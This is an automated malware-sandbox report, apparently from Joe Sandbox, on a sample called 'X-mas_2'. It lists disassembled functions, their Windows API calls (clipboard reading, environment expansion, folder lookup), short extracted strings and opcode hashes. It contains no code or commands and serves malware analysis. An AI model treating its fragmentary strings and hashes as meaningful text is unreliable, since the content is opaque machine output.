Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: %$&$9$<$R$T$W$b
API String ID: 0-3780034300
Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction ID: ee7fd2dff2ddde7bab32b176259b751b51896822e495adff720c9cc9cd8e6875
Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction Fuzzy Hash: 5171801155C7C18AE3158A7C485429BAFD25BE3134F1E8FADE4F6873D2C269C50AC763

Function 020F9769 Relevance: 10.1, Strings: 8, Instructions: 58COMMON

Download Yara Rule

Strings

6= /, xrefs: 020F9830, 020F9837
D$p, xrefs: 020F9829
#1!%, xrefs: 020F97A0
e, xrefs: 020F97C1
*8$), xrefs: 020F978A
?7?0, xrefs: 020F9774
-&64, xrefs: 020F97AB
'>0=, xrefs: 020F9795

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: #1!%$'>0=$*8$)$-&64$6= /$?7?0$e$D$p
API String ID: 0-1814894410
Opcode ID: 2e4761c40ee713d144f2d2b878155c9f06b5ba919b76d1310cf8a6501bf2e463
Instruction ID: 94cc65e1e8a014454a906a74a11b3b340667757f10be7662a6d412bb5dab72c0
Opcode Fuzzy Hash: 2e4761c40ee713d144f2d2b878155c9f06b5ba919b76d1310cf8a6501bf2e463
Instruction Fuzzy Hash: 0011D3B6A4D7828AD339DF1498907AFB6A3ABD5300F199A2CD5C987245CEB449028B47

Function 00432D70 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00432D80
GetClipboardData.USER32 ref: 00432DA1
GlobalLock.KERNEL32 ref: 00432DBA
CloseClipboard.USER32 ref: 00432FC8

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7

Function 02112FD7 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02112FE7
GetClipboardData.USER32 ref: 02113008
GlobalLock.KERNEL32 ref: 02113021
CloseClipboard.USER32 ref: 0211322F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 3ac49be249f4312d960bc0aa698380f488c39b8ca1bc805e0363d2e1c92be2f4
Instruction ID: d72e39a81e916104f2b95b53b5b443c3e50bdee22793a76f9c433f1e7ed241a9
Opcode Fuzzy Hash: 3ac49be249f4312d960bc0aa698380f488c39b8ca1bc805e0363d2e1c92be2f4
Instruction Fuzzy Hash: CC511372A5C7618FC314EF7C888921EBAD19B85224F0A8B7DE8F5D72D5C6748909C782

Function 0040A8A0 Relevance: 7.9, Strings: 6, Instructions: 408COMMON

Download Yara Rule

Strings

%", xrefs: 0040AA62
<, xrefs: 0040A8BE
UUp, xrefs: 0040A9F0
~9, xrefs: 0040A93B
T_XY, xrefs: 0040A9E3
lI, xrefs: 0040ACBE

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: %"$<$T_XY$UUp$lI$~9
API String ID: 0-1611585724
Opcode ID: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
Instruction ID: 5cd483bddd2b52e9b22b037f4d3c0dc2645df5a79fafa00e6023d7c932b65d9b
Opcode Fuzzy Hash: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
Instruction Fuzzy Hash: E7C1067564C3504FD328CFA9949026FBBE2ABD2304F1C853EE5E55B381D679890A878B

Function 020EAB07 Relevance: 7.9, Strings: 6, Instructions: 408COMMON

Download Yara Rule

Strings

%", xrefs: 020EACC9
T_XY, xrefs: 020EAC4A
lI, xrefs: 020EAF25
UUp, xrefs: 020EAC57
<, xrefs: 020EAB25
~9, xrefs: 020EABA2

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: %"$<$T_XY$UUp$lI$~9
API String ID: 0-1611585724
Opcode ID: 340f54a7891148e159267ba91fdad5910ce17753e637a89b7e048f6597601dab
Instruction ID: 53eab074e1e43d484013d8a7cebc6b00a2f6eaebd440f1e803b67c4bc4ccdcb7
Opcode Fuzzy Hash: 340f54a7891148e159267ba91fdad5910ce17753e637a89b7e048f6597601dab
Instruction Fuzzy Hash: 5FC127B274C3508FC719CFA4949026FFBE2ABD6218F18892CE4E64B381D775894AD747

Function 020E9807 Relevance: 7.8, Strings: 6, Instructions: 320COMMON

Download Yara Rule

Strings

fg, xrefs: 020E9B7A
m, xrefs: 020E987A
t{, xrefs: 020E9A66
96, xrefs: 020E9ACE
ec, xrefs: 020E9A5E
T, xrefs: 020E98DC

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: 96$ec$fg$m$t{$T
API String ID: 0-2013138620
Opcode ID: ac98cea338512ee485dd03517579b525f3b0b96d452a750818c06659e980730c
Instruction ID: 484715fac0abc1bf924d2421344b0fea3ec3297f4ec3d10c15c9e84d9ced71d8
Opcode Fuzzy Hash: ac98cea338512ee485dd03517579b525f3b0b96d452a750818c06659e980730c
Instruction Fuzzy Hash: E1A1F4B02083848FDB15DF648895AABBBE5EFC2318F04496DE0D28B391D738C54ADB56

Function 020E88A7 Relevance: 7.7, APIs: 5, Instructions: 220threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 020E88CB
GetCurrentThreadId.KERNEL32 ref: 020E88D5
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020E89B3
GetForegroundWindow.USER32 ref: 020E8A6A
ExitProcess.KERNEL32 ref: 020E8B4F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 1faaf5ee1fb459ccecaf5163c50da23297b3242241028d2029c97af9c3f08c7a
Instruction ID: 8c38e94f62dec9f720eaee8749db33654ab03642af845b66fb49c43d187fbc74
Opcode Fuzzy Hash: 1faaf5ee1fb459ccecaf5163c50da23297b3242241028d2029c97af9c3f08c7a
Instruction Fuzzy Hash: 946139B7B443084FDB18AFA8CC4635AF6D29B85710F0E813DA595DB3A1EA78D8009785

Function 00428F6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C

Strings

zM, xrefs: 00428E89
rM, xrefs: 00428E90

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: rM$zM
API String ID: 237503144-2784921869
Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5

Function 02108F76 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 214COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 02109062
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 021091A3

Strings

zM, xrefs: 021090F0
rM, xrefs: 021090F7

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: rM$zM
API String ID: 237503144-2784921869
Opcode ID: f0d2b9e9ee30d627bce3dfefa7a7323af9f6c1ab8b12b57b2376f619cb6cb68f
Instruction ID: e7338b83ba1f422d94406b6194832ce1124e1324d5eace3166f77b0ae2e3e245
Opcode Fuzzy Hash: f0d2b9e9ee30d627bce3dfefa7a7323af9f6c1ab8b12b57b2376f619cb6cb68f
Instruction Fuzzy Hash: CE61D0F0A443219FE754CF69C995B9ABFB0FB46350F1942A8E445AF392C3748842CBD5

Function 00426360 Relevance: 6.9, Strings: 5, Instructions: 628COMMON

Download Yara Rule

Strings

YzW+, xrefs: 00426434
dMKP, xrefs: 00426444
lmeH, xrefs: 00426454
Sin;, xrefs: 0042644C
xHLG, xrefs: 004264F1, 004264F5

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: Sin;$YzW+$dMKP$lmeH$xHLG
API String ID: 0-2485238161
Opcode ID: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
Instruction ID: 4aad12527c045970d6953cacdb77c585329f148e38e5d38ad86dba377078a4b1
Opcode Fuzzy Hash: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
Instruction Fuzzy Hash: 0A2255B16083918FD7109F29E85136BBBE1EF86304F09887EE5C59B381D739D906CB5A

Function 00419820 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1415COMMON

Download Yara Rule

APIs

Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

FreeLibrary.KERNEL32(?), ref: 00419E7D
FreeLibrary.KERNEL32(?), ref: 00419F1E

Strings

NO, xrefs: 00419CFE

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: NO
API String ID: 764372645-3376426101
Opcode ID: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
Instruction ID: abe4a73a967468b274d366e370c220422a45fd0295e639bb6f5522fed691f7b9
Opcode Fuzzy Hash: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
Instruction Fuzzy Hash: 26924975A183419BE724CF24C890B6BBBE3ABD5304F29C82EE08587365D679DC91CB47

Function 020F9A87 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1415COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 020FA0E4
FreeLibrary.KERNEL32(?), ref: 020FA185

Strings

NO, xrefs: 020F9F65

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: NO
API String ID: 3664257935-3376426101
Opcode ID: 7bf2ebb9b6e6366e04c03ea771c398270cf93257328eb3b96e372e686af4b045
Instruction ID: 471162820fc31ed36835e7ea3d661df9d6371a5e7b2a2576c2a187988ac077de
Opcode Fuzzy Hash: 7bf2ebb9b6e6366e04c03ea771c398270cf93257328eb3b96e372e686af4b045
Instruction Fuzzy Hash: 54923736B983419FE765CF24C880B2BBBE3ABD5304F29C83CD68987661D7759841DB42

Function 00418740 Relevance: 6.6, Strings: 5, Instructions: 346COMMON

Download Yara Rule

Strings

3, xrefs: 00418A94
h2h0, xrefs: 00418768
AC, xrefs: 00418A08
^, xrefs: 0041884F
EFG, xrefs: 00418A13

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 3$h2h0$AC$EFG$^
API String ID: 0-608315617
Opcode ID: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
Instruction ID: d3f7bcd23a71bb6fca4cd7d9fe77f5dce33f5e25f3cb76845b8540b24cd68cf4
Opcode Fuzzy Hash: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
Instruction Fuzzy Hash: 6CC19EB15083918BD334CF29C4913EBBBE1EFD2314F058A2DD8D95B290EB799845CB86

Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

3DJ, xrefs: 00408FB4
@DrF, xrefs: 00408FAC
geYd, xrefs: 00408F8C
QmST, xrefs: 00408F94
AH3, xrefs: 00408FBC

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 3DJ$@DrF$AH3$QmST$geYd
API String ID: 0-2788220846
Opcode ID: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction ID: 4f858eabc2a1050b4af87be1a3efc61e7958397d893593ca31e805b38df32c69
Opcode Fuzzy Hash: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction Fuzzy Hash: A051C42014D3D29AD3118F3984E039BFFE0AFA3304F18556EE8D45B386D33A891AD766

Function 020E9157 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

@DrF, xrefs: 020E9213
3DJ, xrefs: 020E921B
QmST, xrefs: 020E91FB
AH3, xrefs: 020E9223
geYd, xrefs: 020E91F3

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: 3DJ$@DrF$AH3$QmST$geYd
API String ID: 0-2788220846
Opcode ID: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction ID: 944c9472e0ce85f81e3a14769c128651bf703eeeaeffa46e71ccde50e9f9f0b8
Opcode Fuzzy Hash: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction Fuzzy Hash: 3951062018C3C68ED7528F7984D07ABFFE0EFA3208F08556DE8D54B282C325855EE766

Function 02113BC7 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 837COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 02113C5C

Strings

(, xrefs: 02113C62
%*+(, xrefs: 02113D16

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Object
String ID: %*+($(
API String ID: 2936123098-3907155128
Opcode ID: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
Instruction ID: 3bd448aa23fd119a65f50ae7f811103c31f972991fd3da201e3dc743d6e9b64b
Opcode Fuzzy Hash: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
Instruction Fuzzy Hash: 4582A3F0E163249FDB998F18DC51B9ABBF9AB49744F2040DEA00DE7350CB761A818F59

Function 00427CB0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00427DC0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1
API String ID: 237503144-1127181755
Opcode ID: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
Instruction ID: c73f166b7c42da4403d63bb3e24580fd4c4d4143f2e15d469fbc9f0eaa75cdd5
Opcode Fuzzy Hash: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
Instruction Fuzzy Hash: DB121471E04228CFDB14CF68D8917AEB7B1FF55310F1481AED846AB382DB389946CB95

Function 00427A5A Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 561COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA
{B, xrefs: 00427BD0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1${B
API String ID: 237503144-3235371320
Opcode ID: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
Instruction ID: 95f0cad8862f2af99a7bb935661dc1960fd3b24764110846962f877ea0b9236a
Opcode Fuzzy Hash: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
Instruction Fuzzy Hash: F4021571E08224CFDB14CF68D8917AEB7B1FF95314F1481AED846AB381DB389942CB95

Function 00427B08 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 549COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA
{B, xrefs: 00427BD0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1${B
API String ID: 237503144-3235371320
Opcode ID: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
Instruction ID: ffbaa110a31002c00b33609662cf676e3cfc5359165e1e1bb80dc834af8824ee
Opcode Fuzzy Hash: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
Instruction Fuzzy Hash: 74023471E08224CFDB14CF64D8917AEB7B1FF95314F1481ADD846AB382DB389942CB95

Function 00415966 Relevance: 5.6, Strings: 4, Instructions: 563COMMON

Download Yara Rule

Strings

U2F0, xrefs: 00415ACF
ZyZ{, xrefs: 00415B90
FaA, xrefs: 00415DFE
D, xrefs: 00415DF6

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: D$FaA$U2F0$ZyZ{
API String ID: 0-749592270
Opcode ID: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
Instruction ID: a205d1b6f2728990741de773bc6b50b2cd9b8380381c49761b832d911385fcab
Opcode Fuzzy Hash: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
Instruction Fuzzy Hash: 1202ABB1508391CBD3248F25C4617ABBBF1EFC2359F158A1DE4CA4B391E3798885CB96

Function 0041DE90 Relevance: 4.6, Strings: 3, Instructions: 867COMMON

Download Yara Rule

Strings

urz|, xrefs: 0041E57C
J, xrefs: 0041E58C
n~xx, xrefs: 0041E584

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: J$n~xx$urz|
API String ID: 0-3220001382
Opcode ID: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
Instruction ID: 6a91fd7be6a80c1624e75f382a73f26f0e074c3cb1dfdb16b98c5d7a18dbd3f0
Opcode Fuzzy Hash: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
Instruction Fuzzy Hash: 7652BB7850C3918FC725CF29C8506AFBBE1AF95314F084B6DE8E547392D7399805CB9A

Function 020FE0F7 Relevance: 4.6, Strings: 3, Instructions: 867COMMON

Download Yara Rule

Strings

urz|, xrefs: 020FE7E3
n~xx, xrefs: 020FE7EB
J, xrefs: 020FE7F3

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: J$n~xx$urz|
API String ID: 0-3220001382
Opcode ID: b15c2b9b7e48dab479f030e53f639f540212f2b40e84065c1c24286c8bb70a75
Instruction ID: b964c7fd64569acb47308bf6efc0561fa0337059ee7ad69b7af46f839bccbfb7
Opcode Fuzzy Hash: b15c2b9b7e48dab479f030e53f639f540212f2b40e84065c1c24286c8bb70a75
Instruction Fuzzy Hash: 4452A67154C3818FC766CF28C85076EBBE1AF82314F088B6CE9E55B7A2DB359405DB92

Function 00417FE1 Relevance: 4.3, Strings: 3, Instructions: 580COMMON

Download Yara Rule

Strings

BDE:, xrefs: 00418358, 004183F2
L4, xrefs: 004180C0
L4, xrefs: 004183D0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: BDE:$L4$L4
API String ID: 0-3692522541
Opcode ID: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
Instruction ID: dd390c41524992b3b41842bda6cd178197e7fbbdd3d64fed8634c62cd5e5b5ab
Opcode Fuzzy Hash: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
Instruction Fuzzy Hash: FF125C72A082519FD724CF28C8517AFB3E2EBD5314F19893ED48AC7351DB389841CB8A

Function 0041C3CC Relevance: 4.3, Strings: 3, Instructions: 574COMMON

Download Yara Rule

Strings

:G!A, xrefs: 0041C638
{u, xrefs: 0041C64D
Vw1q, xrefs: 0041C654

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: :G!A$Vw1q${u
API String ID: 0-645793561
Opcode ID: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
Instruction ID: e35f9824382157240d3d87f0a1d15c17bfd725fbec35765ed2db11ef4fc98c05
Opcode Fuzzy Hash: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
Instruction Fuzzy Hash: 6C0242B5900216CFDB14CF29C8815FBBBB2FF56310F188569E855AB342E338A991CBD5

Function 020F5BCD Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

D, xrefs: 020F605D
U2F0, xrefs: 020F5D36
ZyZ{, xrefs: 020F5DF7

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: D$U2F0$ZyZ{
API String ID: 0-3682486091
Opcode ID: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
Instruction ID: 5ea94952ad5d0a1dcee7b9a23d8061903dda6776b98b019eaa721444a33aba7e
Opcode Fuzzy Hash: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
Instruction Fuzzy Hash: 4A02BFB11083908BD3648F25C4617ABBBF1FFC2358F158A5CD1DA4BA90E37A8445DB92

Function 00439C70 Relevance: 4.2, Strings: 3, Instructions: 441COMMON

Download Yara Rule

Strings

*0Qx, xrefs: 0043A021
`a, xrefs: 00439FF2
$0Qx, xrefs: 00439FF9

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: $0Qx$*0Qx$`a
API String ID: 0-2354730689
Opcode ID: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
Instruction ID: 6e7c93c0a148da01ad464f35dcf862257e7f2efdc77a60f70c0a7fadf4f8a59e
Opcode Fuzzy Hash: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
Instruction Fuzzy Hash: D5D1243F618212CBCB188F29D86126BB3F2FF8A752F1A947DC485472A0EB789C51D745

Function 004274A5 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

"uB, xrefs: 00427515
QyB, xrefs: 0042794B
)yB, xrefs: 00427923

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

